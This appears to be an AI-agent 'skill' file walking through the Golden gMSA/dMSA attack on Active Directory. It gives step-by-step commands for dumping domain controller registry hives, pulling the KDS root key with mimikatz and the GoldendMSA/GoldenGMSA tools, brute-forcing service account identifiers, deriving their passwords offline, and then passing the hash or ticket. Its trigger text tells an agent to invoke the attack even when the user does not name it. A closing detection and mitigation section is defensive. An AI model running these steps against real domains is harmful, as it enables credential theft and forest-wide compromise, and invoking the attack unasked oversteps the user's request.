Hacktricks-skills golden-gmsa-dmsa-attack

Execute Golden gMSA/dMSA attacks to derive managed service account passwords offline. Use this skill whenever the user mentions gMSA, dMSA, managed service accounts, KDS root key extraction, or wants to compute service account passwords from Active Directory. Trigger for any Active Directory attack involving service account password derivation, even if the user doesn't explicitly name the attack.

Install (source): clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
Manifest: skills/windows-hardening/active-directory-methodology/golden-dmsa-gmsa/SKILL.MD

Source content:

Golden gMSA/dMSA Attack Methodology

This skill guides you through the Golden gMSA/dMSA attack - an offline password derivation technique for Windows Managed Service Accounts that bypasses normal authentication auditing.

⚠️ Authorization Required

This methodology is for authorized security testing only. Ensure you have:

  • Written authorization from the organization
  • Proper scope documentation
  • Legal clearance for Active Directory attacks

Attack Overview

Managed Service Accounts (gMSA/dMSA) store passwords differently from regular accounts: the password is not stored at all but derived on demand from three inputs:

  1. KDS Root Key - Forest-wide secret replicated to all Domain Controllers
  2. Account SID - The service account's security identifier
  3. ManagedPasswordID - Per-account GUID stored in the msDS-ManagedPasswordId attribute

Derivation formula:

AES256_HMAC(KDSRootKey, SID || ManagedPasswordID)
→ 240-byte base64 blob

If you obtain all three inputs, you can compute valid current and future passwords for any gMSA/dMSA in the forest offline, bypassing:

  • LDAP read auditing
  • Password change intervals
  • Kerberos traffic monitoring

Prerequisites Checklist

Before proceeding, verify:

  • Forest-level compromise of at least one DC (or Enterprise Admin)
  • SYSTEM access to a DC, or ability to dump DC secrets
  • .NET ≥ 4.7.2 x64 environment for tooling
  • Network access to enumerate service accounts (LDAP or RID brute-force)

Phase 1: Extract the KDS Root Key

The KDS Root Key is stored in the DC's registry under:

CN=Master Root Keys,CN=Group Key Distribution Service,CN=Services,CN=Configuration,<Forest>

Method A: Direct DC Access (Volume Shadow Copy)

# On the compromised DC
reg save HKLM\SECURITY security.hive
reg save HKLM\SYSTEM system.hive

# Extract with mimikatz
mimikatz # lsadump::secrets
mimikatz # lsadump::trust /patch

Method B: GoldenDMSA Tool (Remote)

# Query KDS root keys from any DC in the forest
GoldendMSA.exe kds --domain <domain.fqdn>

# Or without domain flag if already authenticated
GoldendMSA.exe kds

Method C: GoldenGMSA Tool

GoldenGMSA.exe kdsinfo

Output to capture: the base64 RootKey string together with its GUID name (e.g., RootKey: <GUID> = <base64-string>)

Phase 2: Enumerate gMSA/dMSA Objects

You need three attributes per account:

  • sAMAccountName - Account name
  • objectSid - Security identifier
  • msDS-ManagedPasswordId - Password derivation GUID

Method A: PowerShell (Authenticated)

# Lines ending in a pipe continue on the next line in PowerShell; no backslash is needed
Get-ADServiceAccount -Filter * -Properties msDS-ManagedPasswordId |
  Select-Object sAMAccountName, objectSid, msDS-ManagedPasswordId |
  Export-Csv gmsa-enumeration.csv -NoTypeInformation

Method B: GoldenDMSA LDAP Enumeration

# Kerberos or simple bind
GoldendMSA.exe info -d example.local -m ldap

Method C: GoldenDMSA RID Brute-Force

Use when anonymous binds are blocked:

GoldendMSA.exe info -d example.local -m brute -r 5000 -u <username> -p <password>

Method D: GoldenGMSA

GoldenGMSA.exe gmsainfo

Phase 3: Discover ManagedPasswordID (When Missing)

Some deployments strip msDS-ManagedPasswordId from ACL-protected reads. The GUID structure allows narrow wordlist generation:

  • First 32 bits = Unix epoch time of account creation (minutes resolution)
  • Remaining 96 bits = Random

Generate Wordlist and Test

GoldendMSA.exe wordlist -s <SID> -d example.local -f example.local -k <KDSKeyGUID>

The tool:

  1. Generates candidate GUIDs based on account creation time
  2. Computes candidate passwords
  3. Compares the resulting base64 blobs against the msDS-ManagedPassword attribute
  4. Returns the matching GUID

Phase 4: Offline Password Computation

Once you have all three inputs, derive the password:

GoldenDMSA

# Single line: neither cmd.exe nor PowerShell accepts backslash line continuation
GoldendMSA.exe compute -s <SID> -k <KDSRootKey> -d example.local -m <ManagedPasswordID> -i <KDSRootKeyID>

GoldenGMSA

# Single line for the same reason
GoldenGMSA.exe compute --sid <SID> --kdskey <KDSRootKey> --pwdid <ManagedPasswordID>

Output Format

The tool outputs the derived password in base64 format, which can be:

  • Converted to an NTLM hash
  • Used directly with mimikatz sekurlsa::pth
  • Converted to AES keys for Rubeus Kerberos abuse

Post-Exploitation: Password Injection

Mimikatz Pass-the-Hash

mimikatz # sekurlsa::pth /user:<gmsa-name> /domain:<domain> /ntlm:<hash>

Rubeus Pass-the-Ticket

Rubeus.exe ptt /ticket:<base64-ticket>

Detection & Mitigation

What Defenders Should Monitor

Indicator                        Detection Method
DC registry hive dumps           Monitor reg save commands and Volume Shadow Copy creation
KDS Root Key access              Audit reads of the CN=Master Root Keys container
DSRM usage                       Alert on Directory Services Restore Mode activation
Unusual service password reuse   Detect the same password across multiple hosts
Base64 password writes           Monitor msDS-ManagedPassword attribute changes
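Detection logic for the indicators in the table above, as an added example that is not part of the skill or of the tools it references. It assumes Security events have been exported as one JSON object per line with the standard field names (EventID, CommandLine, ObjectName, AttributeLDAPDisplayName); the sample lines are constructed.

```python
import json
import re

# Constructed sample Security events (JSON lines), not real captures. Field names
# follow the Windows Security log: 4688 process creation, 4662 directory service
# object access, 5136 directory service object modification.
SAMPLE_LOG = r'''
{"EventID": 4688, "Computer": "DC01", "SubjectUserName": "svc-backup", "CommandLine": "reg  save HKLM\\SECURITY C:\\temp\\security.hive"}
{"EventID": 4688, "Computer": "DC01", "SubjectUserName": "admin", "CommandLine": "notepad.exe C:\\notes.txt"}
{"EventID": 4688, "Computer": "DC01", "SubjectUserName": "svc-backup", "CommandLine": "vssadmin create shadow /for=C:"}
{"EventID": 4662, "Computer": "DC01", "SubjectUserName": "svc-backup", "AccessMask": "0x10", "ObjectName": "CN=KEY-GUID-PLACEHOLDER,CN=Master Root Keys,CN=Group Key Distribution Service,CN=Services,CN=Configuration,DC=example,DC=local"}
{"EventID": 4662, "Computer": "DC01", "SubjectUserName": "admin", "AccessMask": "0x10", "ObjectName": "CN=Users,DC=example,DC=local"}
{"EventID": 5136, "Computer": "DC01", "SubjectUserName": "svc-backup", "AttributeLDAPDisplayName": "msDS-ManagedPassword", "ObjectDN": "CN=gmsa-sql,CN=Managed Service Accounts,DC=example,DC=local"}
'''

# reg save of the SECURITY or SYSTEM hive on a DC (the hive-dump step in Method A).
HIVE_DUMP = re.compile(r"\breg(\.exe)?\s+save\s+HKLM\\(SECURITY|SYSTEM)\b", re.I)
# Volume Shadow Copy creation, the other hive-dump route named in the table.
SHADOW_COPY = re.compile(r"\bvssadmin(\.exe)?\s+create\s+shadow\b", re.I)
# Any object below the KDS container in the Configuration partition (lower-cased).
KDS_CONTAINER = "cn=master root keys,cn=group key distribution service"

def classify(event):
    """Map one parsed event to an indicator name from the table, or None."""
    eid = event.get("EventID")
    if eid == 4688:
        cmd = event.get("CommandLine", "")
        if HIVE_DUMP.search(cmd):
            return "DC registry hive dump"
        if SHADOW_COPY.search(cmd):
            return "Volume Shadow Copy creation"
    elif eid == 4662 and KDS_CONTAINER in event.get("ObjectName", "").lower():
        return "KDS Root Key access"
    elif eid == 5136 and event.get("AttributeLDAPDisplayName", "").lower() == "msds-managedpassword":
        return "msDS-ManagedPassword attribute change"
    return None

def detect(log_text):
    """Return one alert per matching JSON line: indicator, host and acting user."""
    alerts = []
    for line in log_text.strip().splitlines():
        event = json.loads(line)
        indicator = classify(event)
        if indicator:
            alerts.append({"indicator": indicator, "computer": event.get("Computer"),
                           "user": event.get("SubjectUserName")})
    return alerts
```

Several indicators from the same account on a DC within a short window (hive dump followed by a KDS container read, as in the sample) is the pattern worth escalating.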

Mitigation Recommendations

  1. Restrict DC backup capabilities to Tier-0 administrators only
  2. Monitor DSRM and VSS creation on all Domain Controllers
  3. Audit KDS Root Key container access in Active Directory
  4. Convert high-privilege gMSAs to classic service accounts where Tier-0 isolation isn't possible
  5. Implement privileged access workstations for DC administration

Tooling Reference

Tool        Purpose                     Repository
GoldenDMSA  Primary attack tool         https://github.com/Semperis/GoldenDMSA
GoldenGMSA  Alternative implementation  https://github.com/Semperis/GoldenGMSA
Mimikatz    Secret extraction, PTH      https://github.com/gentilkiwi/mimikatz
Rubeus      Kerberos abuse, PTT         https://github.com/GhostPack/Rubeus

Common Issues & Troubleshooting

"KDS Root Key not found"

  • Verify you're querying a DC in the same forest
  • Check if KDS is enabled: Get-KdsRootKey
  • Ensure you have Enterprise Admin or DC SYSTEM access

"ManagedPasswordId attribute empty"

  • Account may be ACL-protected; use wordlist generation
  • Try RID brute-force enumeration
  • Check if account is actually a gMSA/dMSA (userAccountControl flags)

"Password derivation fails"

  • Verify KDS Root Key GUID matches the key ID
  • Ensure SID format is correct (S-1-5-...)
  • Check .NET version compatibility (≥ 4.7.2)

References